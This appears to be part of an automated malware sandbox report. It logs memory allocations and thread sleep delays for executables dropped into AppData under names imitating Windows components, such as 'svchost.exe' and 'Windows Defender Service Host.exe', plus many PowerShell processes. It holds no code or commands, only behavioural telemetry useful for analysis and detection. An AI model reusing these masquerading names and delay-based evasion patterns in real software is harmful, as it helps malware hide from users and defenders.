                            Source: C:\Users\user\AppData\Roaming\crack.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeMemory allocated: 1B050000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 4D10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeMemory allocated: 14E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\update.exeMemory allocated: 2F60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\update.exeMemory allocated: 2D60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 1590000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 3180000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 1840000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 1B000000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeMemory allocated: 2490000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeMemory allocated: 24E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeMemory allocated: 44E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeMemory allocated: 12A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeMemory allocated: 1AEC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 2B00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 2D40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 4E40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeMemory allocated: 2B30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeMemory allocated: 1AC90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 750000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 1A530000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 9F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 1A3B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 8E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 1A2E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 2860000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 2900000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 4900000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: FD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMemory allocated: 1AAB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 2540000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 27D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 25E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599881Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599750Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599594Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599079Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598922Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598813Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598688Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598563Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598450Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598329Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598204Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598089Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597969Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597844Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597730Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597610Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597485Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597360Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597235Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597098Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596969Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596844Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596625Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596516Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596407Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596282Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596157Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596032Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 595922Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 595808Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 595657Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599869
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599737
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599578
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599156
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598922
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598813
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598682
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598563
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598453
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598344
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598219
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598000
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597891
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597775
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597656
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597547
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597438
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597313
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597188
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597052
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596922
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596812
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596703
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596594
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596484
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596375
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596266
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596154
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596047
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595937
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595811
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595687
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595578
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595468
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595359
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595250
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595141
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595016
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594903
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594797
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594688
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594569
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594453
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594343
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594231
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594125
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594015
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 593906
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 593797
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599868
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599743
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599625
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599514
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599394
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599261
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599156
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598601
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598475
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598359
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598236
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597983
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597873
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597761
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597631
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597500
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597371
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597263
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597137
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597027
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596922
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596806
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596687
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596578
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596468
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596359
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596231
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596124
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595768
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595500
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595390
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595281
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595171
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595062
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594953
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594843
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594734
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594625
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594515
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594406
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594297
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594182
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594062
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593953
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593838
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593719
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593605
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593472
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593344
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593234
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593125
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593016
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 592904
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 592793
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 9032Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 758Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeWindow / User API: threadDelayed 8919
                            Source: C:\Users\user\AppData\Roaming\update.exeWindow / User API: threadDelayed 915
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeWindow / User API: threadDelayed 9605
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWindow / User API: threadDelayed 8232
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeWindow / User API: threadDelayed 9452
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1576
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeWindow / User API: threadDelayed 9911
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1131
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1614
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1218
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1167
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1345
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1078
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1080
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1178
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1111
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1131
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1337
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1216
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 753
                            Source: C:\Users\user\Desktop\BTC.exe TID: 6968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exe TID: 5756Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exe TID: 5528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe TID: 2584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -599881s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -599750s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -599594s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -599079s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598922s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598813s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598688s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598563s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598450s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598329s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598204s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -598089s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597969s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597844s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597730s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597610s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597485s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597360s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597235s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -597098s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596969s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596844s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596734s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596625s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596516s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596407s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596282s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596157s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -596032s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -595922s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -595808s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -595657s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -100000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99874s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99764s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99656s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99546s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99437s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99324s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99203s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -99093s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98983s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98875s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98765s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98656s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98546s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98437s >= -30000sJump to behavior
